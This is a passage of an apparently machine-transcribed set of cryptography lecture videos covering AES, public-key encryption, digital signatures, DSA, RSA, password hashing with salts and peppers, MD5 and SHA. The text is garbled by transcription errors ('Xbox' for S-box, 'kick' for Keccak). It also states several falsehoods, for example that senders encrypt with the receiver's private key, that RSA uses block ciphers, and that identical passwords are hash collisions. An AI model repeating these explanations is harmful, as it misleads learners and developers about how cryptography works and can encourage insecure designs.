first key in the expanded key set this step is performed only once on a block while being repeated at the end of each round as per iteration demands the state array is xored with the key to get a new state array which is then passed off as input to the sub bytes process in the second stage we have byte substitution we leverage an Xbox called as a substitution box to randomly switch data among each element every single byte is converted into a hexadecimal value having two parts the first part denotes the row value and the second part denotes the column value the entire State array is passed through the s box to create a brand new state array which is then passed off as an input to the row shifting process the 16 input bytes are replaced by looking at a fixed table given in the design we finally get a matrix with four rows and four columns when it comes to row shifting each bit in the four rows of the Matrix is shifted to the left an entry that is a fall off is reinserted to the right of the line the change is done as follows the first line is not moved in any way the second line is shifted to a single position to the left the third line is shifted two positions to the left and the fourth line is shifted three positions to the left the result is a new Matrix that contains the same 16 bytes but has been moved in relation to each other to boost the complexity of the program in mixed columns each column of 4 bytes is now replaced using a special mathematical function the function takes 4 bytes of a column as input and outputs 4 completely new bytes we will get a new Matrix with the same size of 16 bytes and it should be noted that this phase has not been done in the last round of the iteration when it comes to adding a round key the 16 bytes of the Matrix are treated as 128 bits and the 128 bits of the round key are X Out if it is the last round the output is the cipher text if you still have a few rounds remaining the resulting 128 bits are interpreted as 16 bytes and we start another similar row let's take an example to understand how all these processes work if our plain text is the string 2192 we first convert it into a hexadecimal format as follows we use an encryption key which is that's my Kung Fu and it is converted into a hexadecimal format as well as per the guidelines we use a single key which is then later expanded into n plus one number of keys in which case is supposed to be 11 keys for 10 different rounds in round 0 we add the round key the plane test is xorbed with the k0 and we get a state array that is passed off as an input to the substitution by its process foreign bytes process we leverage an s-box to substitute the elements of each byte with a completely new byte this way the state array that we receive is passed off as an input to the row shifting process of The Next Step when it comes to row shifting each element is shifted a few places to the left with the first row being shifted by zero places second row by one place third row by two places and the last by three the state array that we received from the row shifting is passed off as an input to mixed columns in mixed columns we multiply the straight array with a constant Matrix after which I receive a new state array to be passed on onto the next step we add the new state array as an xor with the round key of the particular iteration whatever state array we receive here it becomes an output for this particular round now since this is the first round of the entire encryption process the state array that we receive is passed off as an input to the new round we repeat this process for 10 more rounds and we finally receive a cipher text once the final State array can be denoted in the hexadecimal format this becomes our final ciphertext that we can use for transferring information from the sender and receiver let's take a look at the applications of AES in this world AES finds most used in the area of wireless security in order to establish a secure mode of authentication between routers and clients highly secure mechanisms like WPA and WPA to psk are extensively used in securing Wi-Fi endpoints with the help of indiles algorithm it also helps in SSL TLS encryption that is instrumental in encrypting our internet browser sessions AES Works in tandem with other asymmetric encryption algorithms to make sure the web browser and web server are properly configured and use encrypted channels for communication AES is also prevalent in general file encryption of various formats ranging from critical documents to the media files having a large key allows people to encrypt media and decrypt data with maximum security possible AES is also used for processor Security in Hardware Appliances to prevent machine hijacking among other things as a direct successor to the Des algorithm there are some aspects that AES provides an immediate advantage in let us take a look when it comes to key length the biggest flaw in Des algorithm was its small length was easily vulnerable by today's standards AES has managed to NAB up 128 192 and 256 bit key lens to bolster the security further the block size is also larger in AES a wing to more complexity of the algorithm the number of rounds in Des is fixed irrespective of the plain text being used in AES the number of round depends on the key length that is being used for the particular iteration thereby providing more Randomness and complexity in the algorithm the Des algorithm is considered to be simpler than AES even though AES beats Des when it comes to relative speed of encryption and decryption this makes Advanced encryption standard much more streamlined to be deployed in Frameworks and systems worldwide when it compares to the data encryption standard hello in our last video on cryptography we took a look at symmetric key cryptography we used a single private key for both the encryption and decryption of data and it works very well in theory let's take a look at a more realistic scenario now let's meet Joe Joe is a journalist who needs to communicate with Ryan via long distance messaging due to the critical nature of the information people are waiting for any message to leave Joe's house so that they can intercept it now Joe can easily use symmetric cryptography to send the encrypted data so that even if someone intercepts the message they cannot understand what it says but here's the tricky part how will Joe send the required decryption key to Ryan the center of the message as well as the receiver need to have the same decryption key so that they can exchange messages otherwise Ryan cannot decrypt the information even when he receives the cipher text if someone intercepts the key while transmitting it there is no use in employing cryptography since a third party can now decode all the information easily key sharing is a risk that will always exist when symmetric key cryptography is being used thankfully asymmetric key encryption has managed to fix this problem this is Baba from Simply learn and welcome to this video on asymmetric key cryptography let's take a look at what we are going to learn today We Begin by explaining what asymmetric cryptography is and how it works we take a look at its application and uses we understand why it's called public key cryptography and then learn a little bit about RS encryption and then we learn about the advantages of asymmetrical cryptography oversimetric key cryptography let's understand what asymmetric key cryptography is ometric encryption uses a double layer of protection there are two different keys at play here a private key and a public key a public key is used to encrypt the information pre-transit and a private key is used to decrypt the data post Transit these pair of keys must belong to the receiver of the message the public keys can be shared via messaging blog posts or key servers and there are no restrictions as you can see in the image the two keys are working in the system the sender first encrypts the message using the receiver's private key after which we receive the cipher text the cipher text is then transmitted to the receiver without any other key on getting the ciphertext the receiver uses his private key to decrypt it and get the plain text back there has been no requirement of any key exchange throughout this process therefore solving the most glaring flaw faced in symmetrical cryptography the public key known to everyone cannot be used to decrypt the message and the private key which can decrypt the message need not be shared with anyone the sender and receiver can exchange personal data using the same set of keys as often as possible to understand this better take the analogy of your mailbox anyone who wants to send you a letter has access to the box and can easily share information with you in a way you can say the mailbox is publicly available to all but only you have access to the key that can open the mailbox and read the letters in it this is how the private key comes to play no one can intercept the message and read its contents since it's encrypted once the receiver gets its contents he can use his private key to decrypt the information both the public key and the private key are generated so they are interlinked and you cannot substitute other private keys to decrypt the data in another example if Anis wants to send a message to Bob let's say it reads call me today she must use Bob's public key while encrypting the message upon receiving the cipher message Bob can proceed to use his private key in order to decrypt the message and hence complete Securities attained during transmission without any need for sharing the key since this type of encryption is highly secure it has many users in areas that require High confidentiality it is used to manage digital signature so there is valid proof of a document's authenticity with so many aspects of business transitioning to the digital sphere critical documents need to be verified before being considered authentic and acted upon thanks to asymmetric cryptography centers can now sign documents with their private Keys anyone who needs to verify the authenticity of such signatures can use the sandals public key to decrypt the signature since the public and the private keys are linked to each other mathematically it's impossible to repeat this verification with duplicate keys document encryption has been made very simple by today's standards but the background implementation follows the stimulus approach in blockchain architecture asymmetric cryptography is used to authorize transactions and maintain the system thanks to its two key structures changes are reflected across the blockchain's peer-to-peer Network only if it is approved from both ends along with asymmetric key cryptography Stamper proof architecture it's non-repudiation characteristic also helps in keeping the network stable we can also use asymmetry key cryptography combined with symmetrical cryptography to monitor SSL or TLS encrypted browsering sessions to make sure nobody can still up personal information when accessing banking websites or the internet in general it plays a significant role in verifying websites of authenticity exchanging the necessary encryption Keys required and generating a session using those keys to ensure maximum security instead of the rather insecure HTTP website format security parameters differ on a session by session basis so the verification process is consistent and utterly essential to Modern data security another great use of the asymmetric keyptography structure is transmitting keys for symmetric key cryptography with the most significant difficulty in symmetric encryption being key exchange asymmetric keys can help clear the shortcoming the original message is first encrypted using a symmetric key the key used for encrypting the data is then converted into the ciphertext using the receiver's public key now we have two Cipher text to transmit to the receiver on receiving both of them the receiver uses his private key to decrypt the symmetric key he can then use it to decrypt the original information on getting the key used to encrypt the data while this may seem more complicated than just asymmetric cryptography alone symmetric encryption algorithms are much more optimized for vast amounts of data on some occasions encrypting the key using asymmetric algorithms will definitely be more memory efficient and secure you might remember us discussing why symmetric encryption was called private key cryptography let us understand why asymmetric falls under the public key cryptography we have two keys at our disposal the encryption key is available to everyone the decryption key is supposed to be private unlike symmetric key cryptography there is no need to share anything privately to have an encrypted messaging system to put that into perspective we share our email address with anyone looking to communicate with us it is supposed to be public by Design so that our email login credentials are private and they help in preventing any data mishandling since there is nothing hidden from the world if they want to send us any encrypted information this category is called the public key cryptography there are quite a few algorithms being used today that follow the architecture of asymmetric Greek cryptography none more famous than the RS encryption RSA encryption is the most widely used encryption or public key encryption standard using asymmetric approach named after its Founders reverse Shamir and Edelman it uses block ciphers to obscure the information if you are unfamiliar with how block ciphers work their encryption algorithms that divide the original data into blocks of equal size the block size depends on the exact Cipher being used once they are broken down these blocks are encrypted individually and later chained together to form the final ciphertext widely considered to be the most secure form of encryption albeit relatively slower than symmetric encryption algorithms it is widely used in web browsing secure identification vpns emails and other chat applications with so many variables in play there must be some advantages that give asymmetrical cryptography and Edge over the traditional symmetric encryption methodologies let's go through some of them there is no need for any reliable key sharing channel in asymmetric encryption it was an added risk in private key cryptography that has been completely eliminated in public key architecture the key which is made public cannot recruit any confidential information and the only key that can decrypt doesn't need to be shared publicly under any circumstance we have much more extensive key lengths in RSA encryption and other asymmetric algorithms like 2048 bits key and 4096 bit keys larger keys are much harder to break into via brute force and are much more secure asymmetric key cryptography can use as a proof of authenticity since only the rightful owner of the keys can generate the messages to be decrypted by the private key the situation can also be reversed encryption is done using a private key and decryption is done by the public key which would not function if the correct private key is not used to generate the message hence proving the authenticity of the owner it also has a tamper protection feature where the message cannot be intercepted and changed without invalidating the private key used to encrypt the data consequently the public key cannot decrypt the message and it is easy to realize the information is not 100 legitimate when and where the case requires now that we have a proper revision let's understand what digital signatures are before moving on to the algorithm the objective of digital signatures is to authenticate and verify documents and data this is necessary to avoid tampering and digital modification or forgery of any kind during the transmission of official documents they work on the public key cryptography architecture with one exception typically an asymmetric key system encrypts using a public key and decrypts with a private key for digital signatures however the reverse is true the signature is encrypted using a private key and is decrypted with the public key because the keys are Inked together decoding it with the public key verifies that the proper private key was used to sign the document therefore verifying the signature's provenance let's go through each step to understand the procedure thoroughly in Step 1 we have M which is the original plain text message and it is passed on to a hash function denoted by hash to create a Digest next it bundles the message together with the hash digest and encrypts it using the sender's private key it sends the encrypted bundle to the receiver who can decrypt it using the sender's public key once the message is decrypted it is passed through the same hash function hash to generate a similar Digest it compares the newly generated hash with the bundled hash value received along with the message if they match it verifies data integrity in many instances they provide a layer of validation and security to messages through non-secure Channel properly implemented a digital signature gives the receiver reason to believe that the message was sent by the claim sender digital signatures are equivalent to traditional handwritten signatures in many respects but properly implemented digital signatures are more difficult to forge than the handwritten type digital signature schemes in the sense used here are cryptographically based and must be implemented properly to be effective they can also provide non-repudiation meaning that the signer cannot successfully claim that they did not sign a message while also claiming their private key remains Secret further some non-reparation schemes offer a timestamp for the digital signature so that even if the private key is exposed the signature is valid to implement the concept of digital signature in real world we have two primary algorithms to follow the RSA algorithm and the DS algorithm but the latter is a topic of learning today so let's go ahead and see what the digital signature algorithm is supposed to do digital signature algorithm is a fips standard which is a federal information processing standard for digital signatures it was proposed in 1991 and globally standardized in 1994 by the National Institute of Standards and Technology also known as the nist it functions on the framework of modular exponiation and discrete logarithmic problems which are difficult to compute as a force brood system unlike DSA most signature types are generated by signing message digest with the private key of the originator this creates a digital thumbprint of the data since just the message digests is sign the signature is generally much smaller compared to the data that was signed as a result digital signatures impose less slow down processors at the time of signing execution and they use small volumes of bandwidth DSA on the other hand does not encrypt message digest using private key or decip message digest using public key instead it uses mathematical functions to create a digital signature consisting of two 160-bit numbers which are originated from the message digests and the private key DCS make use of the public key for authenticating the signature but the authorization process is much more complicated when compared with RSM DSA also provides three benefits which is the message authentication Integrity verification and non-repadiation in the image we can see the entire process of DSF validation a plain text message is passed onto a hash function where the digest is generated which is passed on to a signing function signing function also has other parameters like a global variable G of random variable k and the private key of the sender the outputs are then bundled onto a single pack with the plain text and sent to the receiver the two outputs we receive from the signing functions are the two 160 bit numbers denoted by S and R on the receiver and we pass the plain text to the same hash function to regenerate the message Digest it is passed on to verification function which has other requirements such as the public key of the sender Global variable G and SNR received from the sender the value generated by the function is then compared to R if they match then the verification process is complete and data Integrity is verified this was an overview of the way the DSA algorithm works you already know it depends on logarithmic functions to calculate the outputs so let us see how we can do the same in our next section we have three phases here the first of which is key generation to generate the keys we need some prerequisites we'd select a queue which becomes a prime divisor we select a prime number P such that P minus 1 mod Q equal to 0. we also select a random integer G which must satisfy the two formulas being mentioned on the screen right now once these values are selected we can go ahead with generating the keys the private key can be denoted by X and it is any random integer that falls between the bracket of 0 and the value of Q the public key can be calculated as y equal to G to the power x mod P where y stands for the public key the private key can then be packaged as a bundle which comprises of values of p q G and X similarly the public key can also be packaged as a bundle having the values of p q G and Y once you're done with key generation we can start verifying the signature and this generation repeat once the keys are generated we can start generating the signature the message is passed through a hash function to generate the digest Edge first we can choose any random integer K which falls under the bracket of 0 and Q to calculate the first 160 bit number of a signing function of r we use the formula G to the power K mod P into mod Q similarly to calculate the value of the second output that is s we use the following formula that is shown on the screen the signature can then be packaged as a bundle having r and s this bundle along with a plain text message is then passed on to the receiver now with the third phase we have to verify the signature we first calculate the message I just received in the bundle by passing it to the same hash function we calculate the value of w 1 and U2 using the formulas shown on the screen we have to calculate a verification component which is then to be compared with the value of R being sent by the sender this verification component can be calculated using the following formula once calculated this can be compared with the value of R if the values match then the signature verification is successful and the entire process is complete starting from Key generation to the signature Generation all the way up to the verification of the signature with so many steps to follow we are bound to have a few advantages to boot this and we would be right to think so DSA is highly robust in the security and stability aspect when compared to Alternative signature verification algorithms we have a few other ciphers that aim to achieve the Simplicity and the flexibility of DSA but it has been a tough ask for all the other suits the key generation is much faster when compared to the RSA algorithm and such while the actual encryption and decryption process May falter a little in comparison a quicker start in the beginning is well known to optimize a lot of Frameworks DSA requires Less storage space to work its entire cycle in contrast its direct correspondent that is RSA algorithm needs a certain amount of computational and storage space to function efficiently this is not the case with DSL which has been optimized to work with weaker hardware and lesser resources the DSA is patented but nist has made this pattern available worldwide royalty free a draft version of the speculation fips 1865 indicates that DSA will no longer be approved for digital signature generation but it may be used to verify signatures generated prior to the implementation date of that standard the RSA algorithm is a public key signature algorithm developed by a Ron revised ADI Shamir and Leonard Edelman the paper was first published in 1977 and the algorithm uses logarithmic functions to keep the working complex enough to withstand brute force and streamlined enough to be fast post deployment RSA can also encrypt and decrypt general information to securely exchange data along with handling digital signature verification let us understand how it achieve this we take our plain text message M we pass it through a hash function to generate the digest H which is then encrypted using the sender's private key this is appended to the original plain text message and sent over to the receiver once the receiver receives the bundle we can pass the plain text message to the same hash function to generate a digest and the ciphertext can be decrypted using the public key of the sender the remaining hashes are compared if the values match then the data Integrity is verified and the sender is authenticated apart from digital signatures the main case of RSA is encryption and decryption of private information before being transmitted across communication challenge this is where the data encryption comes into play when using RSA for encryption and decryption of General data it reverses the key set usage unlike signature verification it receives the receiver's public key to encrypt the data and uses the receiver's private key in decrypting the data thus there is no need to exchange any keys in this scenario there are two broad components when it comes to RSA cryptography one of them is key generation key generation employs a step of generating the private and the public keys that are going to be used for encrypting and decrypting the data the second part is the encryption and decryption functions these are the ciphers and steps that need to be run when scrambling the data or recovering the data from the ciphertext you will Now understand each of these steps in a next subtopic keeping the previous two concepts in mind let us go ahead and see how the entire process works starting from creating the keeper to encrypting and decrypting the information you need to generate the public and private Keys before running the functions to generate ciphertext and plain text to use certain variables and parameters all of which are explained we first used two large prime numbers which can be denoted by P and Q we can compute the value of n as n equal to P into q and compute the value of Z as P minus 1 into Q minus 1. a number e is chosen at random satisfying the following conditions and a number D is also selected at random following the formula e d mods a equal to 1 and it can be calculated with the formula given below the public key is then packaged as a bundle with n and E and the private key is packaged as a bundle using n and D this sums up the key generation process for the encryption and decryption function we use the formula C and M the ciphertext can be calculated as c equal to m to the power e mod M and the plain text can be calculated from the cipher text as C power D mod n when it comes to a data encryption example let's take p and Q as 7 and 13. the value of n can be calculated as 91. if we select the value of e to be 5 it satisfy all the criteria that we needed to the value of D can be calculated using the following function which gives it as 29. the public key can then be packaged as 91 comma 5 and the private key can then be packaged as 91 comma 29. the plane test if it is 10 which is denoted by m ciphertext can be calculated to the formula c equal to m to the power e mod n which gives us 82. if somebody receives this Cipher text they can calculate the plain text using the formula C to the power D mod n which gives us the value of 10 as selected as our plain text we can now look at the factors that make the RSA algorithm Stand Out versus its competitors and the advantageous topics of this lesson RSA encryption depends on using the receiver's public key so that you don't have to share any secret key to receive the messages from others this was the most glaring flaw faced by symmetric algorithms which were eventually fixed by asymmetric cryptography structure since the keypads are related to each other a receiver cannot intercept the message since they didn't have the correct private keys to decrypt the information if a public key can decrypt the information the sender cannot refuse signing it with his private key without admitting the private key is not in fact private anymore the encryption process is faster than that of the DSA algorithm even if the key generation is slower in RSA many systems across the world tend to reuse the same keys so that they can spend less time in key generation and more time on actual Cipher text management data will be tamper-proof in transit since meddling with the data will alter the usage of the keys the private key won't be able to decade the information hence alerting the receiver of any kind of manipulation in between the receiver must be aware of any third party who possesses the private key since they can alter the data made Transit the cases of which are rather low imagine creating an account on a new website you provide your email address and set a password that you are confident and you would not forget what about the website owner how securely are they going to store your passport for website administrators they have three Alternatives they can either store the passwords in a plain text format they can encrypt the passwords using an encryption and decryption key or they can store the passwords in a hash value let's have a look at each of these when a password is stored in plain text format it is considered to be the most unsafe option since anyone in the company can read your passwords a single hack and a data server breach will expose all the accounts credentials without needing any extra effort to counter this owners can encrypt the passwords and keep them in the servers as a second alternative but that would mean they also have to store the decryption key somewhere on their servers in the event of a data breach or the server hack both the decryption key and encrypted password should be leaked thus making it a single point of failure what if there was an option to store the passwords after scrambling them completely but with no way to decrypt them this is where hashing comes to play since only the hashed values are stored in the server though encryption is needed with no plain text passwords to protect your credentials are safe from the website administrators considering all the pros cached passwords are the industry standard when it comes to storing credentials nowadays before getting too deep into the topic let's get a brief overview of how hashing works hashing is the process of scrambling a piece of information or data beyond recognition we can achieve this by using hash functions which are essentially algorithms that perform mathematical operations on the Mainframe text the value generated after passing the printex information through the hash function is called the hash value digest or in general just the hash of the original data while this may sound similar to encryption the major difference is hashes are meant to be irreversible no decryption key can convert a digest back to its original value however a few hashing algorithms have been broken due to the increase in computational complexity of today's new generation computers and processors there are new algorithms that stand the test of time and are still in use among multiple areas for password storage identity verification Etc like we discussed earlier websites use Hashim to store the user's passwords so how do they make use of these hash passwords when a user signs up to create a new account the password is then run through the hash function and the resulting hash value is stored on the servers so the next time a user comes to log into the account the password he enters is passed through the same hash function and compared to the hash stored on the main server if the newly calculated hash is the same as the one stored on the website server the password must have been correct because according to Hash functions terminology same inputs will always provide the same outputs if the hashes do not match then the password enter during login is not the same as the password entered during the sign out hence the login will be denied this way no plain text passwords gets stored preventing both the owner from snooping on user data and protecting users privacy in the unfortunate event of a data breach or a hack apart from password storage hashing can also be used to perform Integrity checks when a file is uploaded on the internet the files hash value is generated and it is uploaded along with the original information when a new user downloads the file he can calculate the digest of the downloaded file using the same hash function when the hash values are compared if they match then file Integrity has been maintained and there has been no data corruption since so much important information is being passed onto the hash function we need to understand how they work as hash function is a set of mathematical calculations operated on two blocks of data the main input is broken down into two blocks of similar size the block size is dependent on the algorithm that is being used hash functions are designed to be one way they shouldn't be reversible at least by Design some algorithms like the previously mentioned md5 have been compromised but most secure algorithms are being used today like the Sha family of algorithms the digest size is also dependent on the respective algorithm being used md5 has a digest of 128 bits while sh-256 has a digest of 256 bits this digest must always be the same for the same input irrespective of how many times the calculations are carried out this is a very crucial feature since comparing the hash value is the only way to check if the data is untouched as the functions are not reversible there are certain requirements of a hash function that need to be met before they are accepted while some of them are easy to guess others are placed in order to preserve Security in the long run the hash function must be quick enough to encrypt large amounts of data at a relatively Fast Pace but it also shouldn't be very fast running the algorithm on all cylinders makes the functions easy to boot force and a security liability there must be a balance to allow the hash function to handle large amounts of data and not make it ridiculously easy to Brute Force by running through all the possible combinations foreign function must be dependent on each bit of the input the input can be text audio video or any other file extension if a single character is being changed it doesn't matter how small that character may be the entire digest must have a distinctly different hash value this is essential to create unique digests for every password that is being stored but what if two different users are using the same password since the hash function is the same for all users both the digest will be the same this is called a hash Collision you may think this must be a rare occasion where two users have exactly the same password but that is not the case we have techniques like salting that can be used to reduce these hash collisions as we will discuss later in this video you would be shocked to see the most used passwords of 2020. all of these passwords are laughably insecure and since many people use the same passwords repeatedly on different websites hash collisions risks are more common than one would expect let's say the hash functions find two users having the same password how can they store both the hashes without messing up the original data this is where sorting and peppering come to play salting is the process of adding a random keyword to the end of the input before it is passed on to the hash function this random keyword is unique for each user on the system and it is called the salt value or just the salt so even if two passwords are exactly the same the salt value will differ and so will they Digest there is a small problem with this process though since the salt is unique for each user they need to be stored in the database along with the passwords and sometimes even in plain text to speed up the process of continuous verification if the server is hacked then the hashes will need to be brute forced which takes a lot of time but if they receive the salts as well the entire process becomes very fast this is something that preparing aims to solve peppering is the process of adding a random string of data to the input before passing them to the hash function but this time the random string is not unique for each user it is supposed to be common for all users in the database and the extra bit added is called the pepper in this case the pepper is installed on the servers it is mostly hard coded onto the website source code since it's going to be the same for all credentials this way even if the servers get hacked they will not have the right paper needed to crack into all the passwords many websites use a combination of salting and peppering to solve the problem of hash collision and bolster security since Brute Force takes such a long time many hackers avoid taking the effort the returns are mostly not worth it and the possible combinations of using both salting and peppering is humongous with the consensus aiming towards an educated public on digital privacy it's no surprise to see an increasing interest in encryption algorithms we have already covered the major names like the Des and the AES algorithm 75 algorithm was one of the first hashing algorithms to take the global stage as a successor to the md4 despite the security vulnerabilities encountered in the future md5 Still Remains a crucial part of data infrastructure in a multitude of environments the md5 hashing algorithm is a one-way cryptographic functions that accepts a message of any length as input and it returns as output of fixed length digest value to be used for authenticating the original messages the digest size is always 128 bits irrespective of the input the md5 hash function was originally designed for use as a secure cryptographic hash algorithm to authenticate digital signatures md5 has also been depreciated for users other than as a non-cryptographic checksum to verify data integrity and detect unintentional data corruption Ronald reverse founder of RSA data security and Institute professor at MIT designed md5 as an improvement to a prior massive digest algorithm which was the md4 as already iterated before the process is straightforward we pass a print text message to the md5 hash functions which in turn perform certain mathematical operations on the clear text to scramble the data the 128-bit digest received from this is going to be radically different from the plain text the goal of any message digest function is to produce digest that appear to be random to be considered cryptographically secure the hash functions should meet two requirements first that it is impossible for an attacker to generate a message that matches a specific hash value and second that it is impossible for an attacker to create two messages that produce the same hash value even a slight change in the plain text should trigger a drastic difference in the two digests this goes a long way in preventing hash collisions which take place when two different plain texts have the same Digest to achieve this level of intricacy there are a number of steps to be followed before we receive the Digest let us take a look at the detailed procedure as to how the md5 hash algorithm works the first step is to make the plain text compatible with the hash function to do this we need to Pat the bits in the message when we receive the input string we have to make sure the size is 64-bit short of a multiple of 512. when it comes to padding the bits we must add one first followed by zeros to round out the extra characters this prepares a string to have a length of just 64 bits less than any multiple of 512. here on out we can proceed On To The Next Step where we have to Pat the length bits initially in the first step we appended the message in such a way that the total length of the bits in the message was 64 bit short of any multiple of 512. now we add the length width in such a way that the total number of bits in the message is perfectly a multiple of 512. that means 64-bit lens to be precise are added to the message our final string to be hashed is now a definite multiple of 512. The Next Step would be to initialize the message digest buffer the entire hashing plain text is now broken down into 512-bit blocks there are four buffers or registers that are of 32 bits each named a b c and d these are the four words that are going to store the values of each of these sub blocks the first iteration to follow these registers will have fixed hexadecimal values as shown on the screen below once these values are initial of these 512 blocks we can divide each of them into 16 further sub blocks of 32 bits each for each of these sub blocks we run four rounds of operations having the four buffer variables a b c and d these rounds require the other constant variables as well which differ with each round of operation the constant values are stored in a random array of 64 elements since each 32-bit sub-block is Run 4 times 16 such sub locks equals 64 constant values needed for a single block iteration the sub blocks can be denoted by the alphabet M and the constant values are denoted by the alphabet T coming to the actual round of operation we see our four buffers which already have pre-initialized values for the first iteration at the very beginning the values of buffers b c and d are passed on to a non-linear logarithmic function the formula behind this function changes whether particular round being worked on as we shall see later in this video once the output is calculated it is added to the raw values stored in buffer a the output of this addition is added to the particular 32-bit subblock using which we are running the four operations the output of this requisite function then needs to be added to a constant value derived from the constant array k since we have 64 different elements in the array repeat since we have 64 different elements in the array we can use a distinct element for each iteration of a particular block The Next Step involves a circular shift that increases the complexity of the hash algorithm and is necessary to create a unique digest for each individual input the output generated is later added to the value stored in the buffer B the final output is now stored in the second buffer of B of the output register individual values of c DNA are derived from the preceding element before the iteration started meaning the value of b gets stored in C value of C is stored in D and the value of D in a now that we have a full register ready for this subblock the values of a b c d are moved on as input to the next sub block once all 16 sub blocks are completed the final register value is saved and the next 512-bit block begins at the end of all these blocks we get a final digest of the md5 algorithm regarding the non-linear process mentioned in the first step the formula changes for each round it's being run on this is done to maintain the computational complexity of the algorithm and to increase randomness of the procedure the formula for each of the four rounds uses the same parameters that is b c and d to generate a single output the formula is being used are shown on the screen right now algorithm unlike the latest hash algorithm families a 32-bit digest is relatively easier to compare when verifying the digests they don't consume a noticeable amount of disk storage and are comparatively easier to remember and reiterate passwords need not be stored in plain text format making them accessible for hackers and malicious actors when using digest the database security also gets a boost since the size of all the hash values will be the same in the event of a hack or a breach the malicious actors will only receive the hashed values so there is no way to regenerate the plain text which should be the user passwords in this case since the functions are irreversible by Design hashing has become a compulsion when storing user credentials on the server nowadays a relatively low memory footprint is necessary when it comes to integrating multiple Services into the same framework without a CPU overhead the digest size is the same and the same steps are run to get the hash value irrespective of the size of the input string this helps in creating a low requirement for computational power and is much easier to run on older Hardware which is pretty common in server farms around the world we can monitor file corruption by comparing hash values before and after Transit once the hashes match file Integrity checks are valid and we can avoid data corruption hash functions will always give the same output for the similar input irrespective of the iteration parameters it also helps in ensuring that the data hasn't been tampered with on route to the receiver of the message we use our Wi-Fi every day for work and we use the internet for entertainment and communication the dependency on technology is at an all-time high thanks to the radical developments and innovation in these last two decades a big portion of this belongs to ensuring secure channels of communication and data transmission the secure hash algorithm are a family of a cryptographic hash functions that are published by the National Institute of Standards and Technology along with the NSA it was passed as a federal information processing standard also known as fips it has four different families of hash functions ssj-0 is a 160-bit hash function published in 1993 and it was closed down later after an undisclosed significant flow sha1 is also a 160-bit hash function which resembles the earlier md5 algorithm this was designed by the NSA to be a part of the digital signature algorithm sha2 is a family of two similar hash functions to different block sizes known as the sha-256 and the sha-512 they differ in the word size sh-256 uses 32-bit words while sha 512 uses 64-bit words shj3 is a hash function properly known as kick it was chosen in 2012 after a public competition among non-nsa designers it supports the same hash lens as hj2 and its internal structure differs significantly from the rest of the Sha family as we have already iterated the process is straightforward we pass a plain text message to the Sha hash function which in turn performs certain mathematical operations on the clear text to scramble the data the 160 bit digest received from this is going to be radically different from the print text the goal of any hash function is to produce digest that appear to be random to be considered cryptographically secure the hash function should meet two requirements first that it is impossible for an attacker to generate a message that matches a specific hash value and second it should be impossible for an attacker to create two messages producing the exactly same hash value even a slight change in the plain text should trigger a drastic difference in the two Digest this goes a long way in preventing hash collisions which takes place when two different plain texts have the same Digest the Sha family functions have some characteristics that they need to follow while generating the Digest let's go through a few of them the length of the clear text should be less than 2 to the power 64 bits in the case of sha1 and sh256 this is essential to keep the plain text compatible with the hash function and the size needs to be in comparison area to keep the digest as random as possible the length of the hash digest should be 256 bits in the sha-256 algorithm 512 bits in the Sha 512 algorithm and so on bigger digest usually suggests significantly more calculations at the cost of speed and space we typically go for the longest digestive bolster security but there must be a definite balance between the speed and security of a hash function by Design all hash function of the Sha 512 sh-256 are irreversible you should neither get a plain text when you have the digest beforehand nor should the digest provide the original value when you pass it through the same hash function again another case of protection is that when the hash digest is passed into the Sha function for a second time we should get a completely different digest from the first instance this is done to reduce the chance of Brute Force attacks to achieve this level of intricacy there are a number of steps to be followed before we receive the Digest let us take a look at the detailed procedure as to how the Sha algorithm works the first step is to make the plain text compatible with the hash function to do this we need to Pat the bits in the message when you receive the input string you have to make sure the size is 64-bit short of a multiple of 512. when it comes to padding the image you must add one first followed by the remaining zeros to round out the extra characters this prepares a string to have a length just 64 bits less than any multiple of 512. here on out we can proceed to The Next Step where we have to Pat the length bits initially in the first step we appended the message in such a way that the total number of bits in the message was 64-bit short from becoming a multiple of 512. now we add the length of bits in such a way that the total number of bits in the message is a perfect multiple of 512. that means 64 bits plus the length of the original message becomes a multiple of 512. this becomes a final string that needs to be hashed in the next step we have to initialize this chaining variables the entire plain text message can now be broken down into blocks of 512 bits each unlike other hash algorithms like md5 which use four registers or buffers sha family use five buffers of 32 bits each they are named a b c d and e these registers go through multiple rounds of operation where the first iteration has fixed has a decimal values as can be seen in the screen moving on we have to process each of the 512-bit blocks by breaking each of them into 16 sub blocks of 32 bits each of them goes through four rounds of operation that use the entire register and have the 512-bit block along with the constant array out of those four rounds each round has 20 iterations so in general we have 80 round sum total the constant value of K is an array of 80 elements of those 80 16 elements are being used each round so that comes out to 80 rounds for each of the elements the value of T differs by the number of rounds as can be seen in the table below a single formula is necessary to calculate the output of each round and iteration the formula can be a b c d e register is equal to e plus a non-linear process P along with a circular shift of a plus WT plus KT in this formula ABCD is the register value of the chaining variables as we discussed before p is The Logical process which has a different formula for each round S5 is a circular shift by 5 bits and WT is a 32-bit string derived from the existing sub block this can be calculated depending on the iteration at hand in KT signifies a single element of the 80 character element array which changes depending on the particular round at hand for the values of WT the first 16 values are the same as that of the sub blocks so there is no extra calculation needed for the next 64 elements the value of WT can be calculated as shown in the formula here to better understand this let's take a look at how each of this goes in a sequential process we have our initial register using the five words of 32 bits each in the first step we put the values of a b c and d to the subsequent register as the output next we use a non-linear process P that changes depending on the round and uses the values of b c and d as input whatever output is generated from the non-linear process it is added with the value of the E register next the value of a is circular shifted by 5 bits and is added with the output generated in the previous step the next step is adding the value of WT and the constant element of KT the current output is then stored in the register a similarly this iteration is repeated every round and for each subblock in the process once all the registers are complete and all the sub blocks are joined together to form the single ciphertext message we will have our hashed output regarding the non-linear process P that uses the values of b c and d as input the formula changes every round to maintain a complexity of the program that can withstand Brute Force attacks depending on the round the values are passed through a logical operation which is then added with the values of WT KT and so on now that we understand how to get our hash digest from the plain text let us learn about the advantages we obtain when using the Sha hash algorithm instead of relying on data in a plain text format digital signatures follow asymmetric encryption methodology to verify the authenticity of a document or a file hash algorithms like sh-256 and the industry standard sha 512 go a long way in ensuring the verification of signatures passwords need not be stored in a plain text format which makes them accessible to hackers and other malicious actors when using digest the database security also gets a boost since the size of all hash values will be the same in the event of a hack or a breach the malicious actor will only receive the hash values with no way to regenerate the plain text in this case the plain text would be user credentials since the hash functions are irreversible by design it has become a compulsion when storing passwords on the servers the SSL handshake is a crucial segment of the web browsing sessions and it's done using sha functions it consists of your web browsers and the web servers agreeing on encryption keys and hashing authentication to prepare a secure connection it relies on a combination of symmetric and asymmetric algorithms which ensure the confidentiality of the data transmitted between a web server and a web client like the browsers you can monitor file corruption by comparing hash values before and after Transit once 